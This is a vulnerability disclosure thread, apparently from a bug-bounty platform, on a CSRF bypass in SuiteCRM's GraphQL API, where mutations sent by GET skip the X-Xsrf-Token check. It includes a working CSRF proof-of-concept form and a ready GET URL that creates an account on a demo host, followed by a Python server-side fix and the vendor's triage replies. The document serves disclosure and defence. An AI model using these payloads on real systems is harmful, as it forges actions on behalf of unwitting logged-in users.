CSRF on /api/graphql query executing the mutations through GET requests in salesagility/suitecrm-core
Reported on
Jun 3rd 2023
Description
Mutations are saveRecord or createProcess queries used in GraphQL. SuiteCRM prevents CSRF in this functionality by requiring a POST request with an X-Xsrf-Token header. The bug here is that, when a GET request is sent instead, the backend does not expect the X-Xsrf-Token header. An attacker could leverage this to bypass the existing CSRF protection.
Proof of Concept:
- Save the following with an .html extension, open it and click "Submit request"; the account is created.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://suite8demo.suiteondemand.com/api/graphql">
<input type="hidden" name="query" value="mutation{saveRecord(input:{module:"accounts",attributes:{assigned_user_name:{user_name:"kjn"},name:"testing",phone_office:"",phone_alternate:"",website:"https://14.rs",phone_fax:"",email_addresses:[],billing_address:"",billing_address_street:"",billing_address_city:"",billing_address_state:"",billing_address_postalcode:"",billing_address_country:"",shipping_address:"",shipping_address_street:"",shipping_address_city:"",shipping_address_state:"",shipping_address_postalcode:"",shipping_address_country:"",description:"",account_type:"",industry:"",annual_revenue:"",employees:"",parent_name:"",campaign_name:"",date_entered:"",date_modified:""}}){clientMutationId,record{attributes,id,_id,module,acls,type,favorite}}}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#URL used in GET request
https://suite8demo.suiteondemand.com/api/graphql?query=mutation{saveRecord(input:{module:%22accounts%22,attributes:{assigned_user_name:{user_name:%22will%22},name:%22test%22,phone_office:%22%22,phone_alternate:%22%22,website:%22https://google.com%22,phone_fax:%22%22,email_addresses:[],billing_address:%22%22,billing_address_street:%22%22,billing_address_city:%22%22,billing_address_state:%22%22,billing_address_postalcode:%22%22,billing_address_country:%22%22,shipping_address:%22%22,shipping_address_street:%22%22,shipping_address_city:%22%22,shipping_address_state:%22%22,shipping_address_postalcode:%22%22,shipping_address_country:%22%22,description:%22%22,account_type:%22%22,industry:%22%22,annual_revenue:%22%22,employees:%22%22,parent_name:%22%22,campaign_name:%22%22,date_entered:%22%22,date_modified:%22%22}}){clientMutationId,record{attributes,id,_id,module,acls,type,favorite}}}
#Poc:
https://drive.google.com/file/d/1yBXsdp98SV8Ji7YtGf378EbdKAXkGfG8/view?usp=sharing
Impact
The attacker could bypass the existing CSRF check on the GraphQL endpoint.
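As an added illustration (not code from the report or from SuiteCRM), the check below shows how a backend can close this gap from the server side: it classifies a GraphQL document by operation type and refuses to execute a mutation from a GET request at all, whatever headers that request carries, while a POST carrying a mutation must present an X-Xsrf-Token header that matches the session's CSRF cookie. Python is used as a generic reference rather than the project's PHP; the cookie name XSRF-TOKEN, the example host, the sample URL and the function names are assumptions.

```python
import hmac
import re
from typing import Dict, Optional, Set, Tuple
from urllib.parse import parse_qs, urlsplit

# X-Xsrf-Token is the header named in the report. The XSRF-TOKEN cookie used
# for the double-submit comparison is an assumption for this example.
CSRF_HEADER = "x-xsrf-token"
CSRF_COOKIE = "XSRF-TOKEN"

_COMMENT_RE = re.compile(r"#[^\r\n]*")
_STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')
_WORD_RE = re.compile(r"[A-Za-z_]\w*")


def operation_types(document: str) -> Set[str]:
    """Return the operation types ('query', 'mutation', 'subscription')
    defined at the top level of a GraphQL document.

    Comments and string literals are blanked first so a keyword inside them
    cannot fool the scan, and fragment definitions are skipped. GraphQL
    keywords are case-sensitive, so 'Mutation' is not an operation keyword.
    Anything unrecognised at the top level is reported as 'unknown' so the
    caller can fail closed.
    """
    text = _STRING_RE.sub('""', _COMMENT_RE.sub("", document))
    found: Set[str] = set()
    depth = 0
    head = ""  # top-level text seen since the last top-level brace
    for ch in text:
        if ch == "{":
            if depth == 0:
                words = _WORD_RE.findall(head)
                if not words:
                    found.add("query")  # shorthand "{ ... }" form
                elif words[0] in ("query", "mutation", "subscription"):
                    found.add(words[0])
                elif words[0] != "fragment":
                    found.add("unknown")  # not a valid operation header
                head = ""
            depth += 1
        elif ch == "}":
            depth = max(depth - 1, 0)
        elif depth == 0:
            head += ch
    return found


def document_from_get_url(url: str) -> Optional[str]:
    """Pull the GraphQL document out of a GET request's ?query= parameter."""
    values = parse_qs(urlsplit(url).query).get("query")
    return values[0] if values else None


def check_graphql_request(method: str, document: str,
                          headers: Dict[str, str],
                          cookies: Dict[str, str]) -> Tuple[bool, str]:
    """Decide whether a GraphQL request may execute.

    Rule 1: a document containing a mutation (or anything unparseable) is
    never executed from a GET, regardless of headers.
    Rule 2: such a document over POST must carry an X-Xsrf-Token header that
    matches the CSRF cookie (double-submit cookie pattern).
    Read-only queries are allowed over GET.
    """
    ops = operation_types(document)
    if not ops & {"mutation", "unknown"}:
        return True, "read-only query"
    if method.upper() != "POST":
        return False, f"{method.upper()} not allowed for {sorted(ops)}"
    token = {k.lower(): v for k, v in headers.items()}.get(CSRF_HEADER)
    expected = cookies.get(CSRF_COOKIE)
    if not token or not expected or not hmac.compare_digest(token, expected):
        return False, "missing or mismatched CSRF token"
    return True, "mutation over POST with valid CSRF token"


# Constructed sample modelled on the shape of the report's GET URL
# (shortened; host and values are made up for this example).
SAMPLE_GET_URL = (
    "https://crm.example/api/graphql?query=mutation{saveRecord("
    "input:{module:%22accounts%22,attributes:{name:%22test%22}})"
    "{record{id}}}"
)

if __name__ == "__main__":
    doc = document_from_get_url(SAMPLE_GET_URL) or ""
    print(check_graphql_request("GET", doc, {"X-Xsrf-Token": "t1"}, {"XSRF-TOKEN": "t1"}))
    print(check_graphql_request("POST", doc, {"X-Xsrf-Token": "t1"}, {"XSRF-TOKEN": "t1"}))
    print(check_graphql_request("GET", "{viewer{id}}", {}, {}))
```

The important design point is that the GET path is rejected by the operation type alone: checking for the token only on POST, or only when the header happens to be present, is exactly the gap the report describes. Rejecting mutations over GET also matches the usual GraphQL-over-HTTP convention that GET is reserved for queries.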
Hi srivallikusumba,
Thank you for your Security Report. We have raised the issue from this report with our internal security team to be confirmed. Below is a reference of the issue raised and ID allocated:
- SCRMBT-#237 - CSRF on /api/graphql query executing the mutations through GET requests in salesagility/suitecrm-core
We will review the issue and confirm it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or it does not need to be private then we'll raise it via the GitHub bug tracker or a more appropriate place. Thank you for your continued contribution to the SuiteCRM project.
Kind regards,
SuiteCRM Security Team
Hi @srivallikusumba,
The Security Team have now assessed the following issue:
SCRMBT-#237 - CSRF on /api/graphql query executing the mutations through GET requests in salesagility/suitecrm-core
This issue has been given a severity grading of 'Important'. Due to the severity of this issue we are working to release a fix for it very soon.
Once the fix is released, we aim to include your name in the release notes, giving credit for finding and reporting this issue. Please let us know if you would prefer not to be included or have a specific request on how you would like to be referenced within the release notes.
Thank you for your assistance and contribution to the SuiteCRM product!
Kind regards, SuiteCRM Security Team
Hi @srivallikusumba,
Yes, a CVE will be automatically assigned by huntr.dev when the issue is marked as fixed.
Kind regards, SuiteCRM Security Team